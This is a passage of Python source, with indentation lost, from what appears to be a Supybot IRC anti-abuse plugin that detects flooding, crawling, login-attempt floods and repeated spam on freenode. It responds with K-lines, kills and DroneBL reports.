irc.sendMsg(ircmsgs.join(target))
self.logChannel(irc,"JOIN: [%s] due to flood snote" % target)
try:
network = conf.supybot.networks.get(irc.network)
network.channels().add(target)
except KeyError:
pass
queue.reset()
else:
limit = self.registryValue('userFloodPermit')
life = self.registryValue('userFloodLife')
if limit > -1:
if target.startswith('freenode-connect'):
return
queue = self.getIrcQueueFor(irc,target,'snoteFlood',life)
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
users = list(queue)
if len(queue) > limit:
queue.reset()
queue = self.getIrcQueueFor(irc,target,'snoteFloodLethal',life)
queue.enqueue(','.join(users))
if i.defcon or len(queue) > 1:
for m in queue:
for q in m.split(','):
if not (ircdb.checkCapability(q, 'protected') or target == 'freenode-connect'):
mask = self.prefixToMask(irc,q)
uid = random.randint(0,1000000)
self.kline(irc,q,mask,self.registryValue('klineDuration'),'%s - snote flood on %s' % (uid,target))
self.logChannel(irc,"BAD: %s (snote flood on %s - %s)" % (q,target,uid))
else:
self.logChannel(irc,'NOTE: %s is flooded by %s' % (target,', '.join(users)))
if ircdb.checkCapability(user, 'protected'):
return
queue = self.getIrcQueueFor(irc,user,'snoteFlood',life)
stored = False
for u in queue:
if u == target:
stored = True
break
if not stored:
queue.enqueue(target)
if len(queue)> limit:
targets = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,user,'snoteFloodLethal',life)
queue.enqueue(target)
if i.defcon or len(queue) > 1:
mask = self.prefixToMask(irc,user)
uid = random.randint(0,1000000)
self.kline(irc,user,mask,self.registryValue('klineDuration'),'%s - snote flood %s' % (uid,','.join(targets)))
self.logChannel(irc,"BAD: %s (snote flood %s - %s)" % (user,','.join(targets),uid))
else:
self.logChannel(irc,'NOTE: %s is flooding %s' % (user,', '.join(targets)))
def handleJoinSnote (self,irc,text):
limit = self.registryValue('joinRatePermit')
life = self.registryValue('joinRateLife')
target = text.split('trying to join ')[1].split(' is')[0]
if self.registryValue('ignoreChannel',target):
return
user = text.split('User ')[1].split(')')[0]
user = user.replace('(','!').replace(')','').replace(' ','')
if not ircutils.isUserHostmask(user):
return
mask = self.prefixToMask(irc,user)
if ircdb.checkCapability(user, 'protected'):
return
protected = ircdb.makeChannelCapability(target, 'protected')
if ircdb.checkCapability(user, protected):
return
queue = self.getIrcQueueFor(irc,user,'snoteJoin',life)
stored = False
for u in queue:
if u == user:
stored = True
break
if not stored:
queue.enqueue(user)
i = self.getIrc(irc)
key = 'snoteJoinAlerted'
if len(queue) > limit and limit > 0:
users = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,user,'snoteJoinAlert',self.registryValue('alertPeriod'))
if len(queue):
self.logChannel(irc,'NOTE: [%s] join/part by %s' % (target,', '.join(users)))
queue.enqueue(','.join(users))
life = self.registryValue('crawlLife')
limit = self.registryValue('crawlPermit')
if limit < 0:
return
queue = self.getIrcQueueFor(irc,mask,'snoteJoin',life)
stored = False
for u in queue:
if u == target:
stored = True
break
if not stored:
queue.enqueue(target)
if '1wm' in user:
limit = 1
if len(queue) > limit:
channels = list(queue)
queue.reset()
queue = self.getIrcQueueFor(irc,mask,'snoteJoinLethal',self.registryValue('alertPeriod'))
if len(queue) == 0:
self.logChannel(irc,'NOTE: %s is indexing the network (%s)' % (user,', '.join(channels)))
queue.enqueue(mask)
else:
self.kline(irc,user,mask,self.registryValue('klineDuration'),'crawling')
def handleIdSnote (self,irc,text):
target = text.split('failed login attempts to ')[1].split('.')[0].strip()
user = text.split('Last attempt received from ')[1].split(' on')[0].strip()
if not ircutils.isUserHostmask(user):
return
if user.split('!')[0].lower() == target.lower():
return
limit = self.registryValue('idPermit')
life = self.registryValue('idLife')
if limit < 0:
return
queue = self.getIrcQueueFor(irc,user,'snoteId',life)
queue.enqueue(target)
i = self.getIrc(irc)
targets = []
key = 'snoteIdAlerted'
if len(queue) > limit:
targets = list(queue)
queue.reset()
if not key in i.queues[user]:
def rcu():
i = self.getIrc(irc)
if user in i.queues:
if key in i.queues[user]:
del i.queues[user][key]
i.queues[user][key] = time.time()
schedule.addEvent(rcu,time.time()+self.registryValue('abuseLife'))
if key in i.queues[user]:
if len(queue):
targets = list(queue)
queue.reset()
a = []
for t in targets:
if not t in a:
a.append(t)
mask = self.prefixToMask(irc,user)
(nick,ident,host) = ircutils.splitHostmask(user)
if not mask in i.klines:
uid = random.randint(0,1000000)
privateReason = '%s - ns id flood (%s)' % (uid,', '.join(a))
if i.defcon:
privateReason = '!dnsbl ' + privateReason
self.kline(irc,user,mask,self.registryValue('klineDuration'), privateReason)
self.logChannel(irc,"BAD: %s (%s)" % (user,privateReason))
queue = self.getIrcQueueFor(irc,target,'snoteId',life)
queue.enqueue(user)
targets = []
if len(queue) > limit:
targets = list(queue)
queue.reset()
def rct():
i = self.getIrc(irc)
if target in i.queues:
if key in i.queues[target]:
del i.queues[target][key]
i.queues[target][key] = time.time()
schedule.addEvent(rct,time.time()+self.registryValue('abuseLife'))
if key in i.queues[target]:
if len(queue):
targets = list(queue)
queue.reset()
a = {}
for t in targets:
if not t in a:
a[t] = t
for u in a:
mask = self.prefixToMask(irc,u)
(nick,ident,host) = ircutils.splitHostmask(u)
if not mask in i.klines:
self.kill(irc,nick,self.registryValue('killMessage'))
uid = random.randint(0,1000000)
privateReason = '%s - ns id flood on %s' % (uid,target)
if i.defcon:
privateReason = '!dnsbl ' + privateReason
self.kline(irc,u,mask,self.registryValue('klineDuration'), privateReason)
self.logChannel(irc,"BAD: %s (%s)" % (u,privateReason))
def handleKline(self,irc,text):
i = self.getIrc(irc)
user = text.split('active for')[1]
a = user[::-1]
ar = a.split(']',1)
ar.reverse()
ar.pop()
user = "%s" % ar[0]
user = user.replace('[','!',1)
user = '%s' % user[::-1]
user = user.strip()
if not ircutils.isUserHostmask(user):
return
(nick,ident,host) = ircutils.splitHostmask(user)
permit = self.registryValue('alertOnWideKline')
found = ''
if not i.lastKlineOper.find('freenode/staff/') == -1:
for channel in i.channels:
chan = i.channels[channel]
ns = []
if nick in chan.nicks:
if len(chan.nicks[nick]) == 5:
if chan.nicks[nick][4] and chan.nicks[nick][1] == user:
found = chan.nicks[nick][4]
break
if found:
self.log.info ('Account klined %s --> %s' % (found,user))
if permit > -1:
if '/' in host:
if host.startswith('gateway/') or host.startswith('nat/'):
h = host.split('/')
h[-1] = '*'
host = '/'.join(h)
ranges = self._ip_ranges(host)
announced = False
for range in ranges:
range = range
queue = self.getIrcQueueFor(irc,range,'klineNote',7)
queue.enqueue(user)
if len(queue) == permit:
if not announced:
announced = True
self.logChannel(irc,"NOTE: a kline similar to *@%s seems to hit more than %s users" % (range,self.registryValue('alertOnWideKline')))
def handleNickSnote (self,irc,text):
text = text.replace('Nick change: From ','')
text = text.split(' to ')[1]
nick = text.split(' ')[0]
host = text.split(' ')[1]
host = host.replace('[','',1)
host = host[:-1]
limit = self.registryValue('nickChangePermit')
life = self.registryValue('nickChangeLife')
if limit < 0:
return
mask = self.prefixToMask(irc,'%s!%s' % (nick,host))
i = self.getIrc(irc)
if not i.defcon:
return
queue = self.getIrcQueueFor(irc,mask,'snoteNick',life)
queue.enqueue(nick)
if len(queue) > limit:
nicks = list(queue)
queue.reset()
uid = random.randint(0,1000000)
self.kline(irc,'%s!%s' % (nick,host),mask,self.registryValue('klineDuration'),'%s - nick changes abuses %s/%ss' % (uid,limit,life))
self.logChannel(irc,"BAD: %s abuses nick change (%s - %s)" % (mask,','.join(nicks),uid))
def handleChannelCreation (self,irc,text):
text = text.replace(' is creating new channel ','')
permit = self.registryValue('channelCreationPermit')
user = text.split('#')[0]
channel = '#' + text.split('#')[1]
if '##' in text:
channel = '##' + text.split('##')[1]
i = self.getIrc(irc)
if len(self.registryValue('lethalChannels')) > 0:
for pattern in self.registryValue('lethalChannels'):
if len(pattern) and pattern in channel and not user in channel and not user in i.tokline:
i.toklineresults[user] = {}
i.toklineresults[user]['kind'] = 'lethal'
i.tokline[user] = text
self.log.info('WHOIS %s (%s)' % (user,channel))
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (user,user)))
break
def handleClient (self,irc,text):
i = self.getIrc(irc)
#if i.defcon:
def doNotice (self,irc,msg):
(targets, text) = msg.args
if len(targets) and targets[0] == '*':
# server notices
text = text.replace('\x02','')
if text.startswith('*** Notice -- '):
text = text.replace('*** Notice -- ','')
if text.startswith('Client connecting'):
if 'gateway/vpn/privateinternetaccess' in text:
account = text.split('(')[1].split(')')[0]
account = account.split('@gateway/vpn/privateinternetaccess/')[1].split('/')[0]
#self.log.info('connecting %s' % account)
q = self.getIrcQueueFor(irc,account,'nsregister',600)
if len(q) == 1:
self.logChannel(irc,"SERVICE: fresh account %s moved to pia" % account)
if text.startswith('Possible Flooder '):
self.handleFloodSnote(irc,text)
#elif text.find('is creating new channel') != -1:
# self.handleChannelCreation(irc,text)
elif text.startswith('Nick change: From'):
self.handleNickSnote(irc,text)
elif text.startswith('User') and text.endswith('is a possible spambot'):
self.handleJoinSnote(irc,text)
elif 'failed login attempts to' in text and not 'SASL' in text:
self.handleIdSnote(irc,text)
elif text.startswith('Too many clients, rejecting ') or text.startswith('All connections in use.') or text.startswith('creating SSL/TLS socket pairs: 24 (Too many open files)'):
i = self.getIrc(irc)
if not msg.prefix in i.limits or time.time() - i.limits[msg.prefix] > self.registryValue('alertPeriod'):
i.limits[msg.prefix] = time.time()
self.logChannel(irc,'INFRA: %s is rejecting clients' % msg.prefix.split('.')[0])
if not i.netsplit:
self.logChannel(irc,'INFO: netsplit activated for %ss : some abuses are ignored' % self.registryValue('netsplitDuration'))
i.netsplit = time.time() + self.registryValue('netsplitDuration')
elif text.startswith('KLINE active') or text.startswith('K/DLINE active'):
self.handleKline(irc,text)
elif text.find('due to too high load') != -1:
i = self.getIrc(irc)
if not 'services.' in i.limits:
i.limits['services.'] = time.time()
reason = text.split("type '")[1]
reason = reason.split(' ')[0]
self.logChannel(irc,"INFRA: High load on services ('%s)" % reason)
def rct():
i = self.getIrc(irc)
if 'services.' in i.limits:
del i.limits['services.']
schedule.addEvent(rct,time.time()+self.registryValue('alertPeriod'))
elif 'K-Line for [*@' in text:
oper = text.split(' ')[0]
i = self.getIrc(irc)
i.lastKlineOper = oper
reason = text.split('K-Line for [*@')[1]
reason = reason.split(']')[1].replace('[','').replace(']','')
hasPattern = False
for p in self.registryValue('droneblPatterns'):
if p in reason:
hasPattern = p
break
ip = text.split('K-Line for [*@')[1].split(']')[0]
permit = self.registryValue('ipv4AbusePermit')
if not 'evilmquin' in oper and permit > -1:
ranges = self._ip_ranges(ip)
for range in ranges:
range = range
q = self.getIrcQueueFor(irc,'klineRange',range,self.registryValue('ipv4AbuseLife'))
q.enqueue(ip)
if len(q) > permit:
hs = []
for m in q:
hs.append(m)
q.reset()
uid = random.randint(0,1000000)
if self.registryValue('useOperServ'):
irc.sendMsg(ircmsgs.IrcMsg('PRIVMSG OperServ :AKILL ADD %s !T %s %s' % (range,self.registryValue('klineDuration'),'%s - repeat abuses on this range (%s/%ss)' % (uid,permit,self.registryValue('ipv4AbuseLife')))))
else:
irc.sendMsg(ircmsgs.IrcMsg('KLINE %s *@%s :%s|%s' % (self.registryValue('klineDuration'),range,self.registryValue('klineMessage'),'%s - repeat abuses on this range (%s/%ss)' % (uid,permit,self.registryValue('ipv4AbuseLife')))))
self.logChannel(irc,"BAD: abuses detected on %s (%s/%ss - %s) %s" % (range,permit,self.registryValue('ipv4AbuseLife'),uid,','.join(hs)))
permit = permit + 1
if '!dnsbl' in text or hasPattern:
reason = ''
if '!dnsbl' in text:
reason = text.split('!dnsbl')[1].replace(']','').strip()
else:
reason = hasPattern
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
else:
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.resolve,name=format('resolve %s', '*!*@%s' % ip),args=(irc,'*!*@%s' % ip,'',True, reason))
t.setDaemon(True)
t.start()
else:
self.prefixToMask(irc,'*!*@%s' % ip,'',True,reason)
elif 'failed login attempts to' in text and 'SASL' in text:
self.handleSaslFailure(irc,text)
elif text.startswith('FILTER'):
ip = text.split(' ')[2].split('[')[1].split(']')[0]
if utils.net.isIPV4(ip) or utils.net.bruteIsIPV6(ip):
if not ip in self.ipfiltered:
if self.registryValue('serverFilteringPermit') > -1:
q = self.getIrcQueueFor(irc,'serverSideFiltering',ip,self.registryValue('serverFilteringLife'))
q.enqueue(ip)
reason = 'Server Side Filtering'
if len(q) > self.registryValue('serverFilteringPermit'):
self.ipfiltered[ip] = True
if len(self.registryValue('droneblKey')) and len(self.registryValue('droneblHost')) and self.registryValue('enable'):
t = world.SupyThread(target=self.fillDnsbl,name=format('fillDnsbl %s', ip),args=(irc,ip,self.registryValue('droneblHost'),self.registryValue('droneblKey'),reason))
t.setDaemon(True)
t.start()
else:
self.handleMsg(irc,msg,True)
def do215 (self,irc,msg):
i = self.getIrc(irc)
if msg.args[0] == irc.nick and msg.args[1] == 'I':
i.lines[msg.args[4]] = '%s %s %s' % (msg.args[2],msg.args[3],msg.args[5])
# if len(i.dlines):
# h = i.dlines.pop(0)
# self.log.info('DLINE %s|%s' % (h,self.registryValue('saslDuration')))
# irc.sendMsg(ircmsgs.IrcMsg('DLINE %s %s on * :%s' % (self.registryValue('saslDuration'),h,self.registryValue('saslMessage'))))
# if len(i.dlines):
# irc.queueMsg(ircmsgs.IrcMsg('TESTLINE %s' % i.dlines[0]))
def handleSaslFailure (self,irc,text):
i = self.getIrc(irc)
limit = self.registryValue('saslPermit')
if limit < 0:
return
life = self.registryValue('saslLife')
account = text.split('failed login attempts to ')[1].split('.')[0]
host = text.split('<Unknown user (via SASL):')[1].split('>')[0]
q = self.getIrcQueueFor(irc,'sasl',account,life)
q.enqueue(host)
hosts = {}
if len(q) > limit:
for ip in q:
hosts[ip] = ip
q.reset()
q = self.getIrcQueueFor(irc,'sasl',host,life)
q.enqueue(account)
if len(q) > limit:
q.reset()
hosts[host] = host
if self.registryValue('enable'):
if len(hosts) > 0:
for h in hosts:
if len(i.dlines):
i.dlines.append(h)
else:
i.dlines.append(h)
found = None
users = None
i = self.getIrc(irc)
for server in i.servers:
if not users or users < i.servers[server]:
found = server
users = i.servers[server]
if found:
irc.queueMsg(ircmsgs.IrcMsg('stats I %s' % found))
self.logChannel(irc,'NOTE: %s (%s) (%s/%ss)' % (h,'SASL failures',limit,life))
def warnedOnOtherChannel (self,irc,channel,mask):
for chan in list(irc.state.channels):
if chan != channel:
if self.hasAbuseOnChannel(irc,chan,mask):
return True
return False
def hasAbuseOnChannel (self,irc,channel,key):
chan = self.getChan(irc,channel)
kind = 'abuse'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if kind in chan.buffers:
if key in chan.buffers[kind]:
if len(chan.buffers[kind][key]) > limit:
return True
return False
def isAbuseOnChannel (self,irc,channel,key,mask):
chan = self.getChan(irc,channel)
kind = 'abuse'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
life = self.registryValue('%sLife' % kind,channel=channel)
if not kind in chan.buffers:
chan.buffers[kind] = {}
if not key in chan.buffers[kind]:
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
found = False
for m in chan.buffers[kind][key]:
if mask == m:
found = True
break
if not found:
chan.buffers[kind][key].enqueue(mask)
i = self.getIrc(irc)
if i.defcon:
limit = limit - 1
if limit < 0:
limit = 0
if len(chan.buffers[kind][key]) > limit:
self.log.debug('abuse in %s : %s : %s/%s' % (channel,key,len(chan.buffers[kind][key]),limit))
# chan.buffers[kind][key].reset()
# queue not reseted, that way during life, it returns True
if not chan.called:
if not i.defcon:
self.logChannel(irc,"INFO: [%s] ignores lifted, limits lowered due to %s abuses for %ss" % (channel,key,self.registryValue('abuseDuration',channel=channel)))
if not i.defcon:
i.defcon = time.time()
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
self.applyDefcon(irc)
chan.called = time.time()
return True
return False
def isBadOnChannel (self,irc,channel,kind,key):
chan = self.getChan(irc,channel)
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
i = self.getIrc(irc)
if i.netsplit:
kinds = ['flood','lowFlood','nick','lowRepeat','lowMassRepeat','broken']
if kind in kinds:
return False
life = self.registryValue('%sLife' % kind,channel=channel)
if limit == 0:
return '%s %s/%ss in %s' % (kind,limit,life,channel)
if not kind in chan.buffers:
chan.buffers[kind] = {}
newUser = False
if not key in chan.buffers[kind]:
newUser = True
chan.buffers[kind][key] = utils.structures.TimeoutQueue(life)
chan.buffers[kind]['%s-creation' % key] = time.time()
elif chan.buffers[kind][key].timeout != life:
chan.buffers[kind][key].setTimeout(life)
ignore = self.registryValue('ignoreDuration',channel=channel)
if ignore > 0:
if time.time() - chan.buffers[kind]['%s-creation' % key] < ignore:
newUser = True
chan.buffers[kind][key].enqueue(key)
if newUser or i.defcon or self.hasAbuseOnChannel(irc,channel,kind) or chan.called:
limit = limit - 1
if limit < 0:
limit = 0
if len(chan.buffers[kind][key]) > limit:
chan.buffers[kind][key].reset()
if not kind == 'broken':
self.isAbuseOnChannel(irc,channel,kind,key)
return '%s %s/%ss in %s' % (kind,limit,life,channel)
return False
def hasBadOnChannel (self,irc,channel,kind,key):
chan = self.getChan(irc,channel)
if not kind in chan.buffers:
return False
if not key in chan.buffers[kind]:
return False;
return len(chan.buffers[kind][key]) > 0
def isChannelUniSpam (self,irc,msg,channel,mask,text):
count = len([char for char in text if char in self.spamchars])
return len(text) < 32 and count >=3
def isChannelCtcp (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'ctcp',mask)
def isChannelNotice (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'notice',mask)
def isChannelLowFlood (self,irc,msg,channel,mask,text):
return self.isBadOnChannel(irc,channel,'lowFlood',mask)
def isChannelCap (self,irc,msg,channel,mask,text):
text = text.replace(' ','')
if len(text) == 0 or len(text) > self.registryValue('capMinimum',channel=channel):
limit = self.registryValue('capPermit',channel=channel)
if limit < 0:
return False
trigger = self.registryValue('capPercent',channel=channel)
matchs = self.recaps.findall(text)
#self.log.info ('%s : %s : %s :%s' % (mask,channel,text,len(matchs)))
if len(matchs) and len(text):
percent = (len(matchs)*100) / (len(text) * 1.0)
#self.log.info ('%s: %s/%s %s' % (mask,percent,trigger,text))
if percent >= trigger:
return self.isBadOnChannel(irc,channel,'cap',mask)
return False
def isChannelFlood (self,irc,msg,channel,mask,text):
if len(text) == 0 or len(text) >= self.registryValue('floodMinimum',channel=channel) or text.isdigit():
return self.isBadOnChannel(irc,channel,'flood',mask)
return False
def isChannelHilight (self,irc,msg,channel,mask,text):
return self.isHilight(irc,msg,channel,mask,text,False)
def isChannelLowHilight (self,irc,msg,channel,mask,text):
return self.isHilight(irc,msg,channel,mask,text,True)
def isChannelUnicode (self,irc,msg,channel,mask,text):
limit = self.registryValue('badunicodeLimit',channel=channel)
if limit > 0:
score = sequence_weirdness(u'%s' % text)
count = self.registryValue('badunicodeScore',channel=channel)
if count < score:
return self.isBadOnChannel(irc,channel,'badunicode',mask)
return False
def isHilight (self,irc,msg,channel,mask,text,low):
kind = 'hilight'
if low:
kind = 'lowHilight'
limit = self.registryValue('%sNick' % kind,channel=channel)
if limit < 0:
return False
count = 0
users = []
if channel in irc.state.channels and irc.isChannel(channel):
for u in list(irc.state.channels[channel].users):
if u == 'ChanServ' or u == msg.nick:
continue
users.append(u.lower())
flag = False
us = {}
for user in users:
if len(user) > 3:
if not user in us and user in text:
us[user] = True
count = count + 1
if count > limit:
flag = True
break
result = False
if flag:
result = self.isBadOnChannel(irc,channel,kind,mask)
return result
def isChannelRepeat (self,irc,msg,channel,mask,text):
return self.isRepeat(irc,msg,channel,mask,text,False)
def isChannelLowRepeat (self,irc,msg,channel,mask,text):
return self.isRepeat(irc,msg,channel,mask,text,True)
def isRepeat(self,irc,msg,channel,mask,text,low):
kind = 'repeat'
key = mask
if low:
kind = 'lowRepeat'
key = 'low_repeat %s' % mask
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
if len(text) < self.registryValue('%sMinimum' % kind,channel=channel):
return False
chan = self.getChan(irc,channel)
life = self.registryValue('%sLife' % kind,channel=channel)
trigger = self.registryValue('%sPercent' % kind,channel=channel)
if not key in chan.logs:
chan.logs[key] = utils.structures.TimeoutQueue(life)
elif chan.logs[key].timeout != life:
chan.logs[key].setTimeout(life)
logs = chan.logs[key]
flag = False
result = False
for m in logs:
if compareString(m,text) > trigger:
flag = True
break
if flag:
result = self.isBadOnChannel(irc,channel,kind,mask)
enough = False
i = self.getIrc(irc)
if flag and not i.netsplit:
if kind in chan.buffers and key in chan.buffers[kind]:
# we start to try to create pattern if user hits around 2/3 of his buffer
if len(chan.buffers[kind][key])/(limit * 1.0) > 0.55:
enough = True
if result or enough:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
if self.registryValue('computedPattern',channel=channel) > -1 and len(text) > self.registryValue('computedPattern',channel=channel):
repeats = []
if low:
pat = ''
for m in logs:
if compareString(m,text) > trigger:
p = largestString(m,text)
if len(p) > self.registryValue('computedPattern',channel=channel):
if len(p) > len(pat):
pat = p
if len(pat):
repeats = [(pat,1)]
else:
repeats = list(repetitions(text))
candidate = ''
patterns = {}
for repeat in repeats:
(p,c) = repeat
#self.log.debug('%s :: %s' % (p,c))
if len(p) < self.registryValue('%sMinimum' % kind, channel=channel):
continue
p = p.strip()
if p in patterns:
patterns[p] += c
else:
patterns[p] = c
if len(p) > self.registryValue('computedPattern',channel=channel):
if len(p) > len(candidate):
candidate = p
elif len(p) * c > self.registryValue('computedPattern',channel=channel):
tentative = ''.join(list((p,) * int(c)))
if not tentative in text:
tentative = ''.join(list(((p + ' '),) * int(c)))
if not tentative in text:
tentative = ''
if len(tentative):
tentative = tentative[:self.registryValue('computedPattern',channel=channel)]
if len(tentative) > len(candidate):
candidate = tentative
elif patterns[p] > self.registryValue('%sCount' % kind,channel=channel):
if len(p) > len(candidate):
candidate = p
if candidate.strip() == channel:
self.log.debug('pattern candidate %s discared in %s' % (candidate,channel))
candidate = ''
if len(candidate) and len(candidate) > self.registryValue('%sMinimum' % kind, channel=channel):
found = False
for p in chan.patterns:
if p in candidate:
found = True
break
if not found:
candidate = candidate.strip()
shareID = self.registryValue('shareComputedPatternID',channel=channel)
i = self.getIrc(irc)
if shareID != -1 or i.defcon:
nb = 0
for chan in i.channels:
ch = i.channels[chan]
life = self.registryValue('computedPatternLife',channel=chan)
if shareID != self.registryValue('shareComputedPatternID',channel=chan):
continue
if not ch.patterns:
ch.patterns = utils.structures.TimeoutQueue(life)
elif ch.patterns.timeout != life:
ch.patterns.setTimeout(life)
ch.patterns.enqueue(candidate)
nb = nb + 1
self.logChannel(irc,'PATTERN: [%s] %s added "%s" in %s channels (%s)' % (channel,mask,candidate,nb,kind))
else:
chan.patterns.enqueue(candidate)
self.logChannel(irc,'PATTERN: [%s] %s added "%s" for %ss (%s)' % (channel,mask,candidate,self.registryValue('computedPatternLife',channel=channel),kind))
logs.enqueue(text)
return result
def isChannelMassRepeat (self,irc,msg,channel,mask,text):
return self.isMassRepeat(irc,msg,channel,mask,text,False)
def isChannelLowMassRepeat (self,irc,msg,channel,mask,text):
return self.isMassRepeat(irc,msg,channel,mask,text,True)
def isMassRepeat (self,irc,msg,channel,mask,text,low):
kind = 'massRepeat'
key = 'mass Repeat'
if low:
kind = 'lowMassRepeat'
key = 'low mass Repeat'
limit = self.registryValue('%sPermit' % kind,channel=channel)
if limit < 0:
return False
if len(text) < self.registryValue('%sMinimum' % kind,channel=channel):
return False
chan = self.getChan(irc,channel)
life = self.registryValue('%sLife' % kind,channel=channel)
trigger = self.registryValue('%sPercent' % kind,channel=channel)
length = self.registryValue('computedPattern',channel=channel)
if not key in chan.logs:
chan.logs[key] = utils.structures.TimeoutQueue(life)
elif chan.logs[key].timeout != life:
chan.logs[key].setTimeout(life)
flag = False
result = False
pattern = None
s = ''
logs = chan.logs[key]
for m in logs:
found = compareString(m,text)
if found > trigger:
if length > 0:
pattern = largestString(m,text)
if len(pattern) < length:
pattern = None
else:
s = s.strip()
if len(s) > len(pattern):
pattern = s
s = pattern
flag = True
break
if flag:
result = self.isBadOnChannel(irc,channel,kind,channel)
if result and pattern and length > -1:
life = self.registryValue('computedPatternLife',channel=channel)
if not chan.patterns:
chan.patterns = utils.structures.TimeoutQueue(life)
elif chan.patterns.timeout != life:
chan.patterns.setTimeout(life)
if len(pattern) > length:
pattern = pattern[:-1]
found = False
for p in chan.patterns:
if p in pattern:
found = True
break
if not found:
shareID = self.registryValue('shareComputedPatternID',channel=channel)
if shareID != -1:
nb = 0
i = self.getIrc(irc)
for chan in i.channels:
ch = i.channels[chan]
if shareID != self.registryValue('shareComputedPatternID',channel=chan):
continue
life = self.registryValue('computedPatternLife',channel=chan)
if not ch.patterns:
ch.patterns = utils.structures.TimeoutQueue(life)
elif ch.patterns.timeout != life:
ch.patterns.setTimeout(life)
ch.patterns.enqueue(pattern)
nb = nb + 1
self.logChannel(irc,'PATTERN: [%s] %s added "%s" in %s channels (%s)' % (channel,mask,pattern,nb,kind))
else:
chan.patterns.enqueue(pattern)
self.logChannel(irc,'PATTERN: [%s] %s added "%s" for %ss (%s)' % (channel,mask,pattern,self.registryValue('computedPatternLife',channel=channel),kind))
logs.enqueue(text)
if result and pattern:
return result
return False
def logChannel(self,irc,message):
channel = self.registryValue('logChannel')
i = self.getIrc(irc)
if channel in irc.state.channels:
self.log.info('logChannel : %s' % message)
msg = ircmsgs.privmsg(channel,message)
if self.registryValue('useNotice'):
msg = ircmsgs.notice(channel,message)
life = self.registryValue('announceLife')
limit = self.registryValue('announcePermit')
if limit > -1:
q = self.getIrcQueueFor(irc,'status','announce',life)
q.enqueue(message)
if len(q) > limit:
if not i.throttled:
i.throttled = True
irc.queueMsg(ircmsgs.privmsg(channel,'NOTE: messages throttled to avoid spam for %ss' % life))
if not i.defcon:
self.logChannel(irc,"INFO: ignores lifted and abuses end to klines for %ss due to abuses" % self.registryValue('defcon'))
if not i.god:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +p' % irc.nick))
else:
for channel in irc.state.channels:
if irc.isChannel(channel) and self.registryValue('defconMode',channel=channel):
if not 'z' in irc.state.channels[channel].modes:
if irc.nick in list(irc.state.channels[channel].ops):
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +qz $~a' % channel))
else:
irc.sendMsg(ircmsgs.IrcMsg('MODE %s +oqz %s $~a' % (channel,irc.nick)))
i.defcon = time.time()
else:
i.throttled = False
if i.opered:
irc.sendMsg(msg)
else:
irc.queueMsg(msg)
else:
if i.opered:
irc.sendMsg(msg)
else:
irc.queueMsg(msg)
def doJoin (self,irc,msg):
if irc.prefix == msg.prefix:
i = self.getIrc(irc)
return
channels = msg.args[0].split(',')
if not ircutils.isUserHostmask(msg.prefix):
return
if ircdb.checkCapability(msg.prefix, 'protected'):
return
i = self.getIrc(irc)
prefix = msg.prefix
gecos = None
account = None
if len(msg.args) == 3:
gecos = msg.args[2]
account = msg.args[1]
if account == '*':
account = None
else:
aa = account.lower()
for u in i.klinednicks:
if aa == u:
self.logChannel(irc,"SERVICE: %s (%s) lethaled account (extended-join %s)" % (msg.prefix,account,msg.args[0]))
src = msg.nick
i.klinednicks.enqueue(aa)
if not src in i.tokline:
i.toklineresults[src] = {}
i.toklineresults[src]['kind'] = 'evade'
i.tokline[src] = src
def f ():
irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
schedule.addEvent(f,time.time()+random.randint(0,7))
#irc.sendMsg(ircmsgs.IrcMsg('WHOIS %s %s' % (src,src)))
break
for channel in channels:
if ircutils.isChannel(channel) and channel in irc.state.channels:
if self.registryValue('ignoreChannel',channel):
continue
chan = self.getChan(irc,channel)
t = time.time()
mask = self.prefixToMask(irc,msg.prefix,channel)
if isCloaked(msg.prefix,self) or account:
t = t - self.registryValue('ignoreDuration',channel=channel) - 1
chan.nicks[msg.nick] = [t,msg.prefix,mask,gecos,account]
if self.registryValue('ignoreRegisteredUser',channel=channel):
if account:
continue
if i.netsplit:
continue
if 'gateway/shell/matrix.org' in msg.prefix:
continue
life = self.registryValue('massJoinLife',channel=channel)
limit = self.registryValue('massJoinPermit',channel=channel)
trigger = self.registryValue('massJoinPercent',channel=channel)
length = self.registryValue('massJoinMinimum',channel=channel)
# massJoin for the whole channel
flags = []
if limit > -1:
b = self.isBadOnChannel(irc,channel,'massJoin',channel)
if b:
self.log.info('Massjoin detected in %s (%s/%s)' % (channel,life,limit))
life = self.registryValue('massJoinHostLife',channel=channel)
limit = self.registryValue('massJoinHostPermit',channel=channel)
## massJoin same ip/host
if limit > -1:
b = self.isBadOnChannel(irc,channel,'massJoinHost',mask)
if b:
if not mask in flags:
flags.append(mask)
# self.logChannel(irc,'NOTE: [%s] %s (%s)' % (channel,b,mask))
# life = self.registryValue('massJoinNickLife',channel=channel)
# limit = self.registryValue('massJoinNickPermit',channel=channel)
## massJoin similar nicks
# if limit > -1:
# key = 'massJoinNick'
# if not key in chan.logs:
# chan.logs[key] = utils.structures.TimeoutQueue(life)
